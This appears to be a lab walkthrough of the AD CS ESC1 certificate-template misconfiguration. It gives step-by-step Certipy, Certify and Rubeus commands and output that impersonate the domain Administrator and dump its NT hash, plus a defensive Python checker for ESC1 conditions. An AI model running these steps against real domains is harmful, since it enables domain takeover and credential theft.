ESC1
1. What is ESC1
The core misconfiguration is that an alternate identity can be specified in the certificate.
If a certificate template allows the request to carry a subjectAltName (SAN) that differs from the user who submits the certificate signing request (CSR), a certificate can be requested as any user in the domain.
Subject Alternative Name (SAN) is an X.509 extension that allows several names identifying a server or a user to be placed in a single SSL/TLS certificate.
Attack flow: enumerate the CA's certificate templates -> find a template that allows a SAN to be supplied -> request that template from AD CS with the target account in the SAN -> authenticate as the account named in the SAN using the certificate AD CS returns.
2. Exploitation
2.1. Prerequisites
- The CA grants enrollment rights to low-privileged users
- Manager approval is disabled
- No authorized signatures are required
- The certificate template's security descriptor is too permissive and lets low-privileged users enroll in it
- The template defines an EKU (Extended Key Usage) that enables authentication
- The template allows the requester to specify a SAN in the CSR
2.2. On Linux
2.2.1. Enumeration
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 41 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 29 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'lab-LAB-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'lab-LAB-DC-CA'
[*] Checking web enrollment for CA 'lab-LAB-DC-CA' @ 'LAB-DC.lab.local'
[!] Error checking web enrollment: [Errno 104] Connection reset by peer
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Template Name : ESC1
Display Name : ESC1
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-05-01T16:53:05+00:00
Template Last Modified : 2023-07-05T11:47:16+00:00
Permissions
Enrollment Permissions
Enrollment Rights : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Full Control Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Owner Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Dacl Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Property Enroll : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
[+] User Enrollable Principals : LAB.LOCAL\Domain Users
[!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication.
From the enumeration output we can see:
- Authorized Signatures Required: 0 (no authorized signature is needed)
- Requires Manager Approval: False (no manager approval is needed)
- Client Authentication: True and Extended Key Usage: Client Authentication (either one suffices)
- Enrollee Supplies Subject: True (a SAN can be specified); this is the key point for exploitation
2.2.2. Exploitation
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc1-enrollee-supplied-subject-for-client-authentication
Request a certificate for the target user (this step may fail with "The NETBIOS connection with the remote host timed out"; running it again resolves it).
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -ca lab-LAB-DC-CA -target LAB-DC.lab.local -template ESC1 -upn 'Administrator@lab.local' -sid S-1-5-21-2570265163-3918697770-3667495639-500
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 67
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@lab.local'
[*] Certificate object SID is 'S-1-5-21-2570265163-3918697770-3667495639-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Authenticate with the pfx certificate
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.22.58
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@lab.local'
[*] SAN URL SID: 'S-1-5-21-2570265163-3918697770-3667495639-500'
[*] Security Extension SID: 'S-1-5-21-2570265163-3918697770-3667495639-500'
[*] Using principal: 'administrator@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
2.3. On Windows
On Windows, use Certify.exe
2.3.1. Enumeration
C:\Users\blwasp\Desktop>.\Certify.exe enum-templates --filter-enabled --filter-vulnerable
v2.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.
[*] Listing info about the enterprise certificate authority 'lab-LAB-DC-CA'
[*] Certificate templates found using the current filter parameters:
Template Name : ESC1
Enabled : True
Publishing CAs : LAB-DC.lab.local\lab-LAB-DC-CA
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Certificate Name Flag : ENROLLEE_SUPPLIES_SUBJECT
Enrollment Flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Manager Approval Required : False
Authorized Signatures Required : 0
Extended Key Usage : Client Authentication, Encrypting File System, Secure Email
Certificate Application Policies : Client Authentication, Encrypting File System, Secure Email
Vulnerabilities
ESC1 : The template has a client authentication EKU and allows enrollees to supply subject.
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
Write Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Dacl : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Property : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
PowerShell can also be used for the enumeration
PS C:\Tools> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
DistinguishedName Name ObjectClass ObjectGUID
----------------- ---- ----------- ----------
CN=OfflineRouter,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local OfflineRouter pKICertificateTemplate f1f9e21c-f31c-4d4e-85de-4682867c4d82
CN=ESC1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local ESC1 pKICertificateTemplate 210ae26a-2668-413c-aad8-983ea2a5434a
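The LDAP filter above encodes the prerequisites listed in 2.1 as raw attribute bits and OIDs. The following added example (not part of the original note or of Certipy/Certify) applies the same checks to template attributes and also flags the Any Purpose and empty-EKU cases, which the page's filter does not cover; the template dicts are constructed from this page's enumeration output, not read from a live directory.

```python
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag bit
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # msPKI-Enrollment-Flag bit: manager approval

# EKUs that make an issued certificate usable for user authentication.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose (not in the page's filter, but also qualifies)
}
# Principals whose Enroll right effectively opens the template to every domain user.
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}   # Everyone, Authenticated Users
LOW_PRIV_RIDS = ("-513", "-515")          # Domain Users, Domain Computers (any domain SID)

def esc1_findings(t):
    """Return the ESC1 conditions a template meets; all five together mean ESC1."""
    ekus = t.get("pKIExtendedKeyUsage", [])
    found = set()
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        found.add("enrollee_supplies_subject")
    if not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        found.add("no_manager_approval")
    if t.get("msPKI-RA-Signature", 0) == 0:       # absent attribute counts as 0
        found.add("no_authorized_signatures")
    if not ekus or set(ekus) & CLIENT_AUTH_EKUS:  # empty EKU list = any purpose
        found.add("client_auth_eku")
    if any(s in LOW_PRIV_SIDS or s.endswith(LOW_PRIV_RIDS) for s in t["enroll_sids"]):
        found.add("low_priv_enroll")
    return found

def is_esc1(t):
    return len(esc1_findings(t)) == 5

# Constructed from the ESC1 template in the enumeration output above.
ESC1_TEMPLATE = {
    "name": "ESC1",
    "msPKI-Certificate-Name-Flag": 0x1,          # ENROLLEE_SUPPLIES_SUBJECT
    "msPKI-Enrollment-Flag": 0x1 | 0x8,          # INCLUDE_SYMMETRIC_ALGORITHMS | PUBLISH_TO_DS
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
    "enroll_sids": ["S-1-5-21-2570265163-3918697770-3667495639-513"],  # LAB\Domain Users
}
# The same template remediated: subject taken from AD (UPN required) and manager approval on.
HARDENED_TEMPLATE = dict(ESC1_TEMPLATE, name="ESC1-hardened",
                         **{"msPKI-Certificate-Name-Flag": 0x2000000,   # SUBJECT_ALT_REQUIRE_UPN
                            "msPKI-Enrollment-Flag": 0x1 | 0x8 | CT_FLAG_PEND_ALL_REQUESTS})

if __name__ == "__main__":
    for tpl in (ESC1_TEMPLATE, HARDENED_TEMPLATE):
        print(tpl["name"], "ESC1" if is_esc1(tpl) else "ok", sorted(esc1_findings(tpl)))
```

Clearing either the name flag or adding manager approval alone already drops the template out of the ESC1 set, which is what the hardened variant shows.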
2.3.2. Exploitation
C:\Users\blwasp\Desktop>.\Rubeus.exe asktgt /user:administrator /certificate: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 /getcredentials /nowrap
v2.3.3
[*] Action: Ask TGT
[*] Got domain: lab.local
[*] Using PKINIT with etype rc4_hmac and subject: CN=Black Wasp, CN=Users, DC=lab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'lab.local\administrator'
[*] Using domain controller: fe80::9aa2:4d04:7c43:e9f6%18:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/lab.local
ServiceRealm : LAB.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : LAB.LOCAL
StartTime : 4/20/2026 4:38:36 PM
EndTime : 4/21/2026 2:38:36 AM
RenewTill : 4/27/2026 4:38:36 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : +rQCSAJd0VU32CWO03/l0Q==
ASREP (key) : 4B2A833FBAA26DB936F01EDCDACED8C2
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE
The base64 output can also be converted to a pfx file and used on Linux (note the spaces and line breaks in the Windows output).
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# cat esc1.b64|tr -d ' \n\r'|base64 -d >esc1_clean.pfx
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy auth -pfx esc1_clean.pfx -dc-ip 10.129.22.58
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@lab.local'
[*] Using principal: 'administrator@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
Warning
- Sometimes a domain controller does not support PKINIT, which may be because its certificate lacks the Smart Card Logon Extended Key Usage (EKU).
- In most cases, when the EKU is missing, the domain controller returns KDC_ERR_PADATA_TYPE_NOSUPP. However, several protocols, including LDAP, support Schannel, that is, authentication over TLS.
- Note that the term "Schannel authentication" comes from the Schannel SSP (Security Support Provider), Microsoft's SSL/TLS implementation in Windows, so Schannel authentication is essentially SSL/TLS client authentication.
See this article for details: Certificates and Pwnage and Patches, Oh My! | by Will Schroeder | Posts By SpecterOps Team Members